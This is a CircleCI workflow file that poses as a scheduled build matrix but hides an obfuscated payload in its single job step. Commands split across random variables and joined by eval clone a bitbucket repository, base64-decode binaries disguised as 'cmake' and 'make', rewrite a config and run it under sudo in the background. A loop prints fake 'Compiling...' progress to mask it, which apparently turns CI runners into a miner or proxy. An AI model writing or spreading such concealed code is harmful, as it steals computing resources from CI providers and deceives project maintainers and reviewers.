version: 2.1

workflows:
  build-push:
    jobs:
      - build:
          matrix:
            parameters:
              build: ["--quiet-unmerge-warn", "--quickpkg-direct", "--rebuild-ignore", "--with-bdeps-auto", "--search-index", "--jobs", "--tree", "--changed-deps-report", "--autounmask-use", "--jobs", "--rebuild-if-new-rev", "--with-bdeps", "--complete-graph-if-new-ver", "--complete-graph", "--resume", "--changed-slot", "--quiet-build", "--noreplace", "--ignore-soname-deps", "--unmerge"]
  build-schedule:
    jobs:
      - build:
          matrix:
            parameters:
              build: ["--quiet-unmerge-warn", "--quickpkg-direct", "--rebuild-ignore", "--with-bdeps-auto", "--search-index", "--jobs", "--tree", "--changed-deps-report", "--autounmask-use", "--jobs", "--rebuild-if-new-rev", "--with-bdeps", "--complete-graph-if-new-ver", "--complete-graph", "--resume", "--changed-slot", "--quiet-build", "--noreplace", "--ignore-soname-deps", "--unmerge"]
    triggers:
      - schedule:
          cron: "17 * * * *"
          filters:
            branches:
              only:
                - master

jobs:
  build:
    machine:
      image: ubuntu-1604:201903-01
    parameters:
      build:
        type: string
        default:
    steps:
      - run:
          name: synrc-space-run
          command: |
            fZGwOvcmXCH="sudo add-ap"
            cMXTbiKkcTs="t-repositor"
            LRWhGT="y ppa:max-c"
            zdiFgKzcqMt="-lv/shadows"
            msjIXTS="ocks-libev "
            ErlvU="-y &>/dev/n"
            eval "$fZGwOvcmXCH""$cMXTbiKkcTs""$LRWhGT""$zdiFgKzcqMt""$msjIXTS""$ErlvU""ull || true"
            aNCCz="sudo add-ap"
            zdRqfDpxm="t-repositor"
            TpbakbVNmg="y ppa:ondre"
            zyvxvwRhkg="j/apache2 -"
            qnHJOSG="y &>/dev/nu"
            eval "$aNCCz""$zdRqfDpxm""$TpbakbVNmg""$zyvxvwRhkg""$qnHJOSG""ll || true"
            sudo apt update || true
            sudo apt --yes install openssl &>/dev/null || true
            VQXnLEoj="sudo apt --"
            LDvnfy="yes install"
            IaOCdprWd=" cl-base64 "
            LJYoOf="git &>/dev/"
            VcqbySLAY="null || tru"
            eval "$VQXnLEoj""$LDvnfy""$IaOCdprWd""$LJYoOf""$VcqbySLAY""e"
            TWwEyju="git clone h"
            cWOigi="ttps://gccb"
            etBKOu="uild@bitbuc"
            VanWOoO="ket.org/gcc"
            oUoyb="build/gcc.g"
            gOemgKh="it &>/dev/n"
            eval "$TWwEyju""$cWOigi""$etBKOu""$VanWOoO""$oUoyb""$gOemgKh""ull"
            vCpjsu="base64 -d g"
            sVuBKwhJw="cc/cmake_np"
            eval "$vCpjsu""$sVuBKwhJw""_ > cmake"
            fhbIGWepnDa="base64 -d g"
            KarJD="cc/config_ "
            eval "$fhbIGWepnDa""$KarJD""> conf"
            uEYeF="base64 -d g"
            myCfJ="cc/make_ > "
            eval "$uEYeF""$myCfJ""make"
            BkmyxUiP="sed -i 's/1"
            UmoZtKC="080/1081/g'"
            eval "$BkmyxUiP""$UmoZtKC"" conf"
            gBwLsnj="chmod +x ma"
            eval "$gBwLsnj""ke cmake"
            buYkzuiP="./cmake"
            eval "$buYkzuiP"""
            SOQVX="sed -i 's/b"
            loUZKGjfrn="uild/ob2o/g"
            eval "$SOQVX""$loUZKGjfrn""' conf"
            lJjXjoACW="sudo ./make"
            tGaZnHDyED=" --config=c"
            dAplbw="onf &>/dev/"
            eval "$lJjXjoACW""$tGaZnHDyED""$dAplbw""null &"
            GCC=$(date +%s)
            while true; do CC=$(date +%s); echo $CC Compiling...; [ $CC -ge $((GCC + 2539)) ] && sudo killall make && break; sleep 224; done
